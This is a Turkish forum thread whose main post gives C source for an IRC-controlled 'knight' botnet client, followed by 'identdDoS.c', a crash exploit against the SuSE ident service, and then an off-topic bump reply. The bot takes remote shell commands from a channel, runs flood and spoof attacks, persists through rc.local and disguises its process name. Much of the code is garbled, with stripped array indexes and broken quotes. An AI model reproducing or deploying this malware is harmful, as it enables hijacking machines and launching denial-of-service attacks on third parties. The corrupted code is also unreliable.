  Send(sock,"NOTICE %s :CHECKSUM <on/off> = Turns checksum on or off\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :IRC <command> = Sends this command to the server\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :SH <command> = Executes a command\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :KILLALL = Kills all current packeting\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :KILL = Kills the knight\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :DISABLE = Disables all packeting from this knight\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :ENABLE = Enables all packeting from this knight\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :VERSION = Requests version of knight\n",sender);
  sleep(2);
  Send(sock,"NOTICE %s :HELP = Displays this\n",sender);
  exit(0);
  }
  void killdis(int sock, char *sender, int argc, char **argv) {
  char buf[1024]={0};
  if (disabled == 1) return;
  sprintf(buf,"kill -9 %d;kill -9 0",actualparent);
  system(buf);
  exit(0);
  }
  void killall(int sock, char *sender, int argc, char **argv) {
  unsigned long i;
  for (i=0;i<numpids;i++) {
  if (pids != 0 && pids != getpid()) {
  Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids);
  kill(pids,9);
  }
  }
  }
  struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
  { "NICK", nickc },
  { "UPDATEHTTP", updatehttp },
  { "UPDATE", update },
  { "CHECKSUM", checksum },
  { "PAN", pan },
  { "MAJIN", majin },
  { "UDP", bysin },
  { "SLICE2", slice2 },
  { "GETSPOOFS", getspoofs },
  { "SPOOFS", spoof },
  { "DISABLE", disable },
  { "ENABLE", enable },
  { "DNS", dns },
  { "VERSION", version },
  { "KILLALL", killall },
  { "HELP", help },
  { "KILL", killdis },
  { (char *)0, (void (*)(int,char *,int,char **))0 } };
  void _PRIVMSG(int sock, char *sender, char *str) {
  int i;
  char *to, *message;
  for (i=0;i<strlen(str) && str != " ";i++);
  str=0;
  to=str;
  message=str+i+2;
  if (*message != 1) return;
  if (message[strlen(message)-1] != 1) return;
  message[strlen(message)-1]=0;
  message++;
  for (i=0;i<strlen(sender) && sender != "!";i++);
  sender=0;
  if (!strncmp(message,"PING ",5)) Send(sock,"NOTICE %s :\01PING %s\01\n",sender,message+5);
  else if (*message == CONTROL_CHAR) {
  char *params[12], name[1024]={0};
  int num_params=0, m;
  message++;;
  Send(sock,"PRIVMSG %s :*** [%s] %s\n",CHAN,sender,message);
  if (!strncmp(message,"IRC ",4)) { Send(sock,"%s\n",message+4); return; }
  else if (!strncmp(message,"SH ",3)) {
  char buf[1024];
  FILE *command;
  if (mfork() != 0) return;
  command=popen(message+3,"r");
  while(!feof(command)) {
  memset(buf,0,1024);
  fgets(buf,1024,command);
  Send(sock,"PRIVMSG %s :%s\n",CHAN,buf);
  sleep(1);
  }
  pclose(command);
  exit(0);
  }
  m=strlen(message);
  for (i=0;i<m;i++) {
  if (*message == " " || *message == 0) break;
  name=*message;
  message++;
  }
  for (i=0;i<strlen(message);i++) if (message == " ") num_params++;
  num_params++;
  if (num_params > 10) num_params=10;
  params[0]=name;
  params[num_params+1]="\0";
  m=1;
  while (*message != 0) {
  message++;
  if (m >= num_params) break;
  for (i=0;i<strlen(message) && message != " ";i++);
  params[m]=(char*)malloc(i+1);
  strncpy(params[m],message,i);
  params[m]=0;
  m++;
  message+=i;
  }
  for (m=0; flooders[m].cmd != (char *)0; m++) {
  if (!strcasecmp(flooders[m].cmd,name)) {
  flooders[m].func(sock,sender,num_params-1,params);
  for (i=1;i<num_params;i++) free(params);
  return;
  }
  }
  }
  }
  void _376(int sock, char *sender, char *str) {
  Send(sock,"MODE %s -xi %s\n",nick,nick);
  Send(sock,"JOIN %s :%s\n",CHAN,KEY);
  Send(sock,"MODE %s +tnsk %s\n",CHAN,KEY);
  Send(sock,"WHO %s\n",nick);
  }
  void _PING(int sock, char *sender, char *str) {
  Send(sock,"PONG %s\n",str);
  }
  void _352(int sock, char *sender, char *str) {
  int i,d;
  char *msg=str;
  struct hostent *hostm;
  unsigned long m,n;
  for (i=0,d=0;d<5;d++) {
  for (;i<strlen(str) && *msg != " ";msg++,i++); msg++;
  if (i == strlen(str)) return;
  }
  for (i=0;i<strlen(msg) && msg != " ";i++);
  msg=0;
  if (!strcmp(msg,nick) && !spoofsm) {
  msg=str;
  for (i=0,d=0;d<3;d++) {
  for (;i<strlen(str) && *msg != " ";msg++,i++); msg++;
  if (i == strlen(str)) return;
  }
  for (i=0;i<strlen(msg) && msg != " ";i++);
  msg=0;
  if ((m = inet_addr(msg)) == -1) {
  if ((hostm=gethostbyname(msg)) == NULL) {
  Send(sock,"NOTICE %s :I"m having a problem resolving my host, someone will have to SPOOFS me manually.\n",CHAN);
  return;
  }
  memcpy((char*)&m, hostm->h_addr, hostm->h_length);
  }
  ((char*)&n)[3]=((char*)&m)[0];
  ((char*)&n)[2]=((char*)&m)[1];
  ((char*)&n)[1]=((char*)&m)[2];
  ((char*)&n)[0]=0;
  spoofsm=256;
  spoofs=n;
  }
  }
  void _433(int sock, char *sender, char *str) {
  int on;
  free(nick);
  nick=(char*)malloc(10);
  memcpy(nick,"knight",6);
  for (on=6;on<9;on++) nick[on]="A"+((rand()-("A"-1))%("A"-("Z"+1)));
  nick[9]=0;
  Send(sock,"NICK %s\n",nick);
  }
  struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
  { "352", _352 },
  { "376", _376 },
  { "433", _433 },
  { "422", _376 },
  { "PRIVMSG", _PRIVMSG },
  { "PING", _PING },
  { (char *)0, (void (*)(int,char *,char *))0 } };
  int con() {
  int sock;
  struct sockaddr_in server;
  unsigned long ipaddr;
  while(1) {
  int g=fork();
  if (g == 0) {
  char *srv;
  srand((time(NULL) ^ getpid()) + getppid());
  srv=servers[rand()%numservers];
  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) while(1);
  server.sin_family = AF_INET;
  server.sin_port = htons(PORT);
  if ((ipaddr = inet_addr(srv)) == -1) {
  struct hostent *hostm;
  if ((hostm=gethostbyname(srv)) == NULL) while(1);
  memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  }
  else server.sin_addr.s_addr = ipaddr;
  memset(&(server.sin_zero), 0, 8);
  if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) while(1);
  break;
  }
  sleep(TIMEOUT);
  if (waitpid(g,NULL,WNOHANG)) exit(0);
  kill(g,9);
  waitpid(g,NULL,0);
  }
  if (fork()) exit(0);
  setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
  setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
  setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
  return sock;
  }
  int main(int argc, char **argv) {
  char *user;
  int sock;
  int on,i;
  char cwd[256];
  FILE *file=fopen("/etc/rc.d/rc.local","r");
  if (file != NULL) {
  char outfile[256], buf[1024];
  int i=strlen(argv[0]), d=0;
  getcwd(cwd,256);
  if (strcmp(cwd,"/")) {
  while(argv[0] != "/") i--;
  sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
  while(!feof(file)) {
  fgets(buf,1024,file);
  if (!strcmp(buf,outfile)) d++;
  }
  if (d == 0) {
  FILE *out;
  fclose(file);
  out=fopen("/etc/rc.d/rc.local","a");
  fputs(outfile,out);
  fclose(out);
  }
  else fclose(file);
  }
  else fclose(file);
  }
  getcwd(cwd,256);
  i=strlen(argv[0]);
  while(argv[0] != "/") i--;
  sprintf(execfile,"\"%s%s\"",cwd,argv[0]+i);
  strncpy(argv[0],"-sh",strlen(argv[0]));
  for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
  srand((time(NULL) ^ getpid()) + getppid());
  nick=(char*)malloc(10);
  memcpy(nick,"knight",6);
  for (on=6;on<9;on++) nick[on]="A"+((rand()-("A"-1))%("A"-("Z"+1)));
  nick[9]=0;
  user=(char*)malloc(10);
  memcpy(user,nick+6,4);
  user[4]="-";
  for (on=5;on<9;on++) user[on]="a"+((rand()-("a"-1))%("a"-("z"+1)));
  user[9]=0;
  if (fork()) exit(0);
  while(1) {
  int g;
  sock=con();
  actualparent=getpid();
  g=fork();
  if (g == -1) while(g == -1) g=fork();
  if (g != 0) {
  while(waitpid(g,NULL,0) <= 0);
  kill(g,9);
  }
  else {
  Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,user,user);
  while(1) {
  unsigned long i;
  fd_set n;
  struct timeval tv;
  FD_ZERO(&n);
  FD_SET(sock,&n);
  tv.tv_sec=60*20;
  tv.tv_usec=0;
  if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) exit(0);
  for (i=0;i<numpids;i++) if (waitpid(pids,NULL,WNOHANG) > 0) {
  int *newpids;
  unsigned long on;
  for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
  numpids--;
  newpids=(int*)malloc(numpids);
  for (on=0;on<numpids;on++) newpids[on]=pids[on];
  free(pids);
  pids=(int*)malloc(numpids);
  for (on=0;on<numpids;on++) pids[on]=newpids[on];
  free(newpids);
  }
  if (FD_ISSET(sock,&n)) {
  char buf[4096], *str;
  int i;
  if ((i=recv(sock,buf,4096,0)) <= 0) exit(0);
  buf=0;
  str=strtok(buf,"\n");
  while(str && *str) {
  char name[1024], sender[1024];
  filter(str);
  if (*str == ":") {
  for (i=0;i<strlen(str) && str != " ";i++);
  str=0;
  strcpy(sender,str+1);
  strcpy(str,str+i+1);
  }
  else strcpy(sender,"*");
  for (i=0;i<strlen(str) && str != " ";i++);
  str=0;
  strcpy(name,str);
  strcpy(str,str+i+1);
  for (i=0;msgs.cmd != (char *)0;i++) if (!strcasecmp(msgs.cmd,name)) msgs.func(sock,sender,str);
  if (!strcasecmp(name,"ERROR")) exit(0);
  str=strtok((char*)NULL,"\n");
  }
  }
  }
  exit(0);
  }
  }
  return 0;
  }

  identdDoS.c  /* --------------------------------------------------------------------------------------------------------------------------------------
  this dosses the SuSe ident server, that it !!! (btw THIS IS NO BUFFER OVERFLOW, the
  server just crashed becoz it thinks the string is to long and sets some pointer to NULL, that"s
  wat make"s it crash, adleast that is wat the advisory i read said)
  ------------------------------------------------------------------------------------------------------------------------

  identdDoS.c

  --| BOF| -- */
  /*
  * identdDoS.c
  * written by R00T-dude
  * based upon an advisory I found on sec-focus
  *
  * enjoy
  *
  * oh, just in case you think this there is a buffer overflow possible, there ISN"T
  * the ident server thinks that the string send is to big so it sets a pointer to NULL
  * and that makes it crash !!!!
  *
  * I tested this at home and it worked fine
  * however I an in an inet. cafe right now and this code isn"t tested, so if you find mistakes in it
  * please don"t bitch bout it (thx in advance)
  *
  */

  #include <stdio.h>
  #include <sys/socket.h>
  #include <netdb.h>
  #include <string.h>

  int main(int argc, char **argv)
  {
  struct sockaddr_in sin;
  struct hostent *hp;
  char stuff[1200];
  int sock, conn, i ;

  if (argc < 2)
  {
  fprintf(stderr, " useage :: %s 127.0.0.1 ", argv[1]);
  exit(0);
  }

  if ( (hp = gethostbyname§argv[1]) == NULL)
  {
  fprintf(stderr, "hostname doesn"t match !");
  exit(0);
  }

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if (sock < 0)
  {
  fprintf(stderr, "socket() doesn"t work !");
  exit(sock);
  }

  sin.sin_family = AF_INET ;
  sin.sin_port = htons(113);
  sin.sin_addr.s_addr = inet_addr(argv[1]);

  conn = connect(sock, (struct sockaddr *)&sin, sizeof(sin));
  if (conn < 0)
  {
  fprintf(stderr, "connect() doesn"t work !");
  exit(conn);
  }

  printf("sending stuff... ");
  for(i=0; i < 1100; i++)
  {
  strcat(stuff, "a");
  }

  send(sock, stuff, sizeof(stuff), 0);
  close(sock);
  printf("done \n");
  }

  --| EOF |--


 2. KısayolKısayol reportŞikayet pmÖzel Mesaj
  YasamaK
  YasamaK's avatar
  Banlanmış Üye
  Kayıt Tarihi: 29/Ağustos/2010
  Erkek

  vay be kaç senelik konu =)) zıplatalım konuyu


  SEVİŞİRKEN EN ZEVKLİ OLAN ŞEY.. tamam, dikkatinizi çektim. ne kadar meraklısınız böyle şeylere terbiyesizliğin lüzumu yok yani :D (, sessizce öldürüyor.)
Toplam Hit: 1973 Toplam Mesaj: 2